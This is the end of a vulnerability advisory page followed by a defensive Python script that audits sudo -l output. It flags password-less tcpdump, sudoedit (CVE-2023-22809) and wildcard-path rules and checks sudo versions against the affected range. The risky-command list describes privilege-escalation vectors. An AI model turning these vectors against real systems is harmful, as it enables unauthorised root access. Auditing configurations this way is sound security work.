/>https://www.korelogic.com/about-korelogic.html<br /><br />Our public vulnerability disclosure policy is available at:<br />https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt<br /><br /></code></pre>
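An audit of sudo -l output covering both KoreLogic advisories above (KL-001-2023-002 and KL-001-2023-003), added here as an example that is not part of either advisory or of the appliance: it parses the rule list and flags NOPASSWD rules for tcpdump (whose -z post-rotate option runs a command), for sudoedit (CVE-2023-22809) and for wildcard paths such as /usr/local/bin/te-*, and checks a sudo version string against the range the sudoedit CVE affects. The sample text is abridged from the advisories' own sudo -l output; the function names are constructed.

```python
import re

# Commands whose ordinary options give the caller a way to run other commands or
# write arbitrary files when allowed without a password. Reasons feed the report.
RISKY_COMMANDS = {
    "tcpdump": "-z <cmd> runs a post-rotate command as the -Z user (root)",
    "sudoedit": "EDITOR/VISUAL with extra '--' arguments edits arbitrary files (CVE-2023-22809)",
}

# Abridged from the sudo -l output printed in the advisories.
SUDO_L_SAMPLE = """\
User thousandeyes may run the following commands on thousandeyes-va:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /bin/systemctl start te-va, /bin/systemctl stop te-va,
        /sbin/reboot, sudoedit /etc/hosts, /usr/bin/dig, /usr/bin/lsof,
        /usr/bin/te-*, /usr/local/bin/te-*, /usr/local/sbin/te-*
    (root) NOPASSWD: /usr/sbin/ntpdate, /usr/sbin/traceroute, /usr/sbin/tcpdump
"""

# "(runas) TAG: cmd, cmd, ..." with zero or more tags such as NOPASSWD:
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.*)$")


def parse_sudo_l(text: str) -> list[dict]:
    """Return one dict per command spec: runas target, NOPASSWD flag and command string."""
    body = text.split("may run the following commands", 1)[-1]
    joined = []
    # A rule starts with "(runas)"; sudo wraps long rules, so continuation lines
    # are glued onto the previous rule before splitting on commas.
    for line in body.splitlines()[1:]:
        if not line.strip():
            continue
        if line.lstrip().startswith("("):
            joined.append(line.strip())
        elif joined:
            joined[-1] += " " + line.strip()
    rules = []
    for entry in joined:
        m = RULE_RE.match(entry)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd:
                rules.append({"runas": m.group("runas"), "nopasswd": nopasswd, "cmd": cmd})
    return rules


def audit(rules: list[dict]) -> list[str]:
    """Flag password-less rules that lead to arbitrary code or file writes as root."""
    findings = []
    for r in rules:
        if not r["nopasswd"]:
            continue
        argv = r["cmd"].split()
        base = argv[0].rsplit("/", 1)[-1]
        if base == "ALL":
            findings.append(f"NOPASSWD: ALL for ({r['runas']})")
        elif base in RISKY_COMMANDS:
            findings.append(f"NOPASSWD: {r['cmd']}: {RISKY_COMMANDS[base]}")
        elif "*" in argv[0]:
            findings.append(f"NOPASSWD: {r['cmd']}: wildcard in path, "
                            "any file matching it runs as root")
    return findings


def sudo_version_affected(version: str) -> bool:
    """CVE-2023-22809 affects sudo 1.8.0 through 1.9.12p1; fixed in 1.9.12p2."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?$", version)
    if not m:
        raise ValueError(f"unrecognised sudo version: {version!r}")
    key = tuple(int(x or 0) for x in m.groups())
    return (1, 8, 0, 0) <= key < (1, 9, 12, 2)


if __name__ == "__main__":
    for finding in audit(parse_sudo_l(SUDO_L_SAMPLE)):
        print(finding)
```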